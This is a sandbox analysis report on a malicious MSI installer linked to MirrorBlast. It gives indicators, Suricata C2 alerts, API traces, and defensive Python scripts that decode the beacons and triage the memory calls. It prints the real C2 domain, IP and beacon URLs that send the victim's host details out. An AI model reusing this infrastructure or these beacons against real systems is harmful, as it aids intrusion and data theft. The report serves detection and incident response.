Summary | ZeroBOX

trehjugdr4et6u.msi

MSOffice File (sandbox category only: the sample is a Windows Installer package, which uses the same OLE2 / Compound File Binary container as legacy Office documents; that shared container is why the generic Office-file Yara rule below matches)
Category: FILE
Machine: s1_win7_x6402
Started: Oct. 8, 2021, 8:22 a.m.
Completed: Oct. 8, 2021, 8:24 a.m.
Size 548.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252
  • Title: Installation Database
  • Subject: This setup package will Install trehjugdr4et6u version 2.99.7763
  • Author: Google (free-text summary-information field written by whoever built the package; it is not a code-signing identity and carries no trust)
  • Keywords: Installer
  • Comments: This installer database contains the logic and data required to install trehjugdr4et6u.
  • Template: Intel;1033
  • Revision Number: {317C5CB8-B185-4823-B543-49B4C65B72B5}
  • Create Time/Date: Thu Oct 7 10:43:26 2021
  • Last Saved Time/Date: Thu Oct 7 10:43:26 2021
  • Number of Pages: 200
  • Number of Words: 10
  • Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528)
  • Security: 2
MD5 065e70c3b1e6841074a25aafa95e20bd
SHA256 a69d27abd043cc676095f71300bf6b2368167536fcd4fe5342cf79a7e94fc2fe
CRC32 C045916A
ssdeep 12288:oC3LUk7ftIXeWc5ie52YOqhPS+KP/w1pZGGgCs5xu8Z:ofaFAeWceYHPS3PIoA4xu
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File

DNS
Name Response Post-Analysis Lookup
feristoaul.com 46.161.40.172

Hosts
IP Address Status Action
164.124.101.2 Active Moloch
46.161.40.172 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49174 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49167 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49165 -> 46.161.40.172:80 2034022 ET MALWARE MirrorBlast CnC Activity M2 Malware Command and Control Activity Detected
TCP 192.168.56.102:49167 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49166 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49166 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49176 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49176 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49177 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49177 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49172 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49179 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49179 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49175 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49180 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49180 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49185 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49185 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49181 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49181 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49193 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49193 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49184 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49184 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49189 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49192 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49197 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49189 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49192 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49197 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49187 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49187 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49165 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49213 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49191 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49213 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49191 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49188 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49196 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49188 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49196 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49168 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49200 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49200 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49195 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49195 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49220 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49199 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49220 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49199 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49201 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49201 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49182 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49182 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49205 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49207 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49205 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49207 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49203 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49203 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49183 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49183 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49208 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49208 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49206 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49206 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49211 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49211 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49209 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49186 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49209 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49219 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49186 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49219 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49216 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49216 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49190 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49190 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49217 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49222 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49217 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49222 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49221 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49221 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49194 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49194 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49223 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49223 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49198 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49198 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49202 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49202 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49215 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49215 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49169 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49218 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49218 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49170 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49171 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49171 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49173 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49178 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49178 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49204 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49204 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic
TCP 192.168.56.102:49212 -> 46.161.40.172:80 2034023 ET MALWARE MirrorBlast CnC Activity M3 Malware Command and Control Activity Detected
TCP 192.168.56.102:49212 -> 46.161.40.172:80 2034021 ET USER_AGENTS Suspicious User-Agent (REBOL) Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features HTTP version 1.0 used suspicious_request GET http://feristoaul.com/r?x=bmFtZT10ZXN0MjItUENcdGVzdDIyJm9zPTYuMSZhcmNoPXg4NiZidWlsZD0xLjAuMg==
suspicious_features HTTP version 1.0 used suspicious_request GET http://feristoaul.com/m?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=
suspicious_features HTTP version 1.0 used suspicious_request GET http://feristoaul.com/p?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=
request GET http://feristoaul.com/r?x=bmFtZT10ZXN0MjItUENcdGVzdDIyJm9zPTYuMSZhcmNoPXg4NiZidWlsZD0xLjAuMg==
request GET http://feristoaul.com/m?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=
request GET http://feristoaul.com/p?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=
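The three beacons above carry their data in a base64-encoded x parameter over plain HTTP/1.0, so a proxy or Suricata HTTP log keeps the full URL and an analyst can recover exactly what the implant disclosed about the host. The script below is an added example, not code from the sandbox report or from the malware: it decodes the three URLs copied from the report and groups the decoded fields into a victim fingerprint. The decoding steps are standard base64 plus form-encoded key=value parsing; the reading of the fields (computername\username, OS version, CPU architecture, implant build, and a uuid reused by the later /m and /p requests) is the editor's interpretation of the decoded text, not documented protocol names.

```python
"""Decode the x= parameter of the MirrorBlast beacons recorded in the report.

Added example, not code from the sandbox report or from the malware. The
URLs are copied from the report; the decoding logic and the interpretation
of the decoded fields are the editor's own.
"""
import base64
from urllib.parse import urlsplit, unquote, parse_qs

# The three GET requests exactly as recorded in the report.
BEACONS = [
    "http://feristoaul.com/r?x=bmFtZT10ZXN0MjItUENcdGVzdDIyJm9zPTYuMSZhcmNoPXg4NiZidWlsZD0xLjAuMg==",
    "http://feristoaul.com/m?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=",
    "http://feristoaul.com/p?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=",
]


def raw_query_param(query: str, name: str) -> str:
    """Return the percent-decoded value of `name` from a query string.

    parse_qs is deliberately avoided here: it turns '+' into a space, which
    would corrupt any '+' that standard base64 may contain.
    """
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    raise KeyError(name)


def decode_beacon(url: str) -> dict:
    """Decode one beacon URL into {'host', 'path', 'fields'}.

    The x parameter is standard base64 of a form-encoded key=value string.
    Padding is restored first in case a proxy or log pipeline trimmed '='.
    """
    parts = urlsplit(url)
    payload = raw_query_param(parts.query, "x")
    payload += "=" * (-len(payload) % 4)
    text = base64.b64decode(payload, validate=True).decode("ascii")
    fields = {k: v[0] for k, v in parse_qs(text, strict_parsing=True).items()}
    return {"host": parts.hostname, "path": parts.path, "fields": fields}


def host_fingerprint(urls) -> dict:
    """Merge every beacon into one view of what the implant disclosed.

    Non-uuid fields (name, os, arch, build) are taken from whichever beacon
    carries them; uuids are collected as a set because the later requests
    repeat the same value. Field meanings are the editor's reading of the
    decoded text (assumption), not protocol documentation.
    """
    out = {"uuids": set(), "paths": []}
    for url in urls:
        beacon = decode_beacon(url)
        out["paths"].append(beacon["path"])
        for key, value in beacon["fields"].items():
            if key == "uuid":
                out["uuids"].add(value)
            else:
                out[key] = value
    return out


if __name__ == "__main__":
    for url in BEACONS:
        print(decode_beacon(url))
    print(host_fingerprint(BEACONS))
```

Decoding the first beacon yields name=test22-PC\test22, os=6.1, arch=x86 and build=1.0.2, which lines up with the sandbox host TEST22-PC seen in the GetComputerName calls and the Windows 7 (NT 6.1) analysis VM; the /m and /p requests carry only the uuid. For incident scoping the same decoder can be run over proxy logs to list every host that registered, since the hostname and user are sent in the clear.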
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x731c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74681000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e32000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72f81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ef1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ee1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ec1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72f31000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1636
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03870000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1636
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x039d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72f22000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1636
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03a10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1636
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0
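The memory-API section above is long and repetitive, and the signal is in three details: every call requests protection 64 (PAGE_EXECUTE_READWRITE), the NtProtectVirtualMemory calls each flip a single 4096-byte page at addresses around 0x72000000-0x75000000, and one NtAllocateVirtualMemory commit carries heap_dep_bypass: 1. The script below is an added example, not part of the sandbox report: it parses a constructed subset of the entries copied from the report (unused fields omitted) in the report's own layout and classifies each RWX operation. The address-range heuristic is an assumption for this example: on 32-bit Windows 7 the system DLLs mapped into a process usually sit in that range, so a single-page RWX re-protection there reads as in-place patching of a loaded module rather than staging of a new payload. The meaning of heap_dep_bypass is also read from its name (an executable commit in heap memory) and should be confirmed against the monitor's documentation.

```python
"""Triage the RWX memory operations from the sandbox's API log.

Added example, not code from the report. SAMPLE_LOG is a constructed
subset of the report's entries (fields not used here were dropped).
"""
import re

SAMPLE_LOG = """
NtProtectVirtualMemory

process_identifier: 1636
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x731c1000
1 0 0

NtAllocateVirtualMemory

process_identifier: 1636
region_size: 1703936
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03870000
allocation_type: 8192 (MEM_RESERVE)
1 0 0

NtAllocateVirtualMemory

process_identifier: 1636
region_size: 4096
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x039d0000
allocation_type: 4096 (MEM_COMMIT)
1 0 0
"""

STATUS_RE = re.compile(r"^\d+ \d+ \d+$")  # the "Status Return Repeated" row

PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
# Assumption for this example: typical load range of system DLLs in a
# 32-bit Windows 7 process, used only to label single-page re-protections.
DLL_RANGE = range(0x70000000, 0x80000000)


def parse_api_log(text: str) -> list:
    """Split the report's per-call layout (name, key: value lines,
    status row) into a list of {'api', 'args', 'status', 'ret', 'repeated'}."""
    records, current = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if STATUS_RE.match(line):
            status, ret, repeated = (int(x) for x in line.split())
            current.update(status=status, ret=ret, repeated=repeated)
            records.append(current)
            current = None
        elif ":" in line:
            key, _, value = line.partition(":")
            current["args"][key.strip()] = value.strip()
        else:
            current = {"api": line, "args": {}}
    return records


def numeric(field: str) -> int:
    """'64 (PAGE_EXECUTE_READWRITE)' -> 64, '0x731c1000' -> 0x731c1000."""
    return int(field.split()[0], 0)


def triage_rwx(records: list) -> list:
    """Return (kind, base_address, size) for every successful RWX operation."""
    findings = []
    for rec in records:
        args = rec["args"]
        if rec["status"] != 1:
            continue  # the sandbox marks failed calls with status 0
        if numeric(args.get("protection", "0")) != PAGE_EXECUTE_READWRITE:
            continue
        base = numeric(args["base_address"])
        if rec["api"] == "NtAllocateVirtualMemory":
            alloc = numeric(args["allocation_type"])
            size = int(args["region_size"])
            if alloc & MEM_COMMIT and args.get("heap_dep_bypass") == "1":
                kind = "rwx_commit_in_heap"   # executable memory backed by the heap
            elif alloc & MEM_RESERVE:
                kind = "rwx_reserve"          # large RWX reservation, payload staging area
            else:
                kind = "rwx_commit"
        elif rec["api"] == "NtProtectVirtualMemory":
            size = int(args["length"])
            kind = "rwx_reprotect_dll_range" if base in DLL_RANGE else "rwx_reprotect"
        else:
            continue
        findings.append((kind, base, size))
    return findings


if __name__ == "__main__":
    for finding in triage_rwx(parse_api_log(SAMPLE_LOG)):
        print("%-24s base=0x%08x size=%d" % finding)
```

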